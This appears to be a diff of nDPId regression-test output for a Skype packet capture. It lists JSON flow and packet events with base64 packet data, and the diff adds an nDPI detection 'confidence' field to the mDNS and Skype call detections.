 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1431970643673,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1431970643673,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKHC4AAEAR2YPAqAEiwKgB\/wCKAIoAtt1hEQJFdcCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAHRFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRzRQAA"}
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1431970643676,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":1431970643676,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKSxEAoqncCoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFzRQAAQUxJQ0VHQVRFAA=="}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1431970643964,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":96,"pkt_l4_len":42,"ts_msec":1431970643964,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NACoR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAqSjYAAAAAAAEAAAAAAAAKTHVjYXMtaU1hYwVsb2NhbAAAHIAB"}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643964,"flow_last_seen":1431970643964,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970643964,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1431970644120,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1431970644120,"pkt":"PBXCt3IOxCwDBkn+CABFAACAhzsAAP8RkTHAqAFc4AAA+xTpFOkAbM4wAACEAAAAAAEAAAACCkx1Y2FzLWlNYWMFbG9jYWwAAByAAQAAAHgAEP6AAAAAAAAAxiwD\/\/4GSf7ADAABgAEAAAB4AATAqAFcwAwAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/g=="}
-00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644120,"flow_last_seen":1431970644120,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1431970644120,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1431970644121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":162,"pkt_l4_len":108,"ts_msec":1431970644121,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAGwR\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QBsYIEAAIQAAAAAAQAAAAIKTHVjYXMtaU1hYwVsb2NhbAAAHIABAAAAeAAQ\/oAAAAAAAADGLAP\/\/gZJ\/sAMAAGAAQAAAHgABMCoAVzADAAcgAEAAAB4ABD+gAAAAAAAAMYsA\/\/+Bkn+"}
-00671{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
+00697{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":513,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970643964,"flow_last_seen":1431970644121,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1431970644121,"l3_proto":"ip6","src_ip":"fe80::c62c:3ff:fe06:49fe","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"lucas-imac.local"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431970644777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970644777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+iz0AAEARV8bAqAEinTc4qjLdnE8AKqlOercCgeG1zG2vbzPj0KjKJlzB46QihppHpHZWBMh9hdX\/8Q=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA533AAAEARH43AqAEib91KDzLdnFoAJRqBerkCLcYyzYQBZ1UUv9afmdL8U47Y0EMKk9GOcm8="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IE0AAEAReEHAqAEiQTffITLdnEIAKKkPersC6xhZmoz4NcwgQN8Oq77mdsG6aJAJEzSI01rU6ec="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7MzsAAEARLhjAqAEiQAQXkTLdnFsAJ6Pner0C2KbUw2DxbMk3cWJigGAv5JrHPRhWYHrZrKFH\/Q=="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+dlAAAEARIrjAqAEinTeCpTLdnFwAKmyyer8CyymJmKIvjgybbxj4QUGrEeWW\/O+vVrSV+3Rj4Yjh8w=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6yaYAAEARHe\/AqAEinTg0GzLdnFkAJhz6esECVdgpKZUPSYYd3u6m4rCVVtMoL0MGJKJcpPJg"}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7AJsAAEAR\/k3AqAEib91KIjLdnFsAJ+15esMC4VlNRvu3By\/5s5rGR+P6LgoKPKR7nd4t4OfW1A=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/TKMAAEAR42DAqAEinTfrqDLdnFgAKzONesUCSrWxfzMM\/u+ve5H0njBV7f1MGIL\/NDrkYJJdktuSF9Y="}
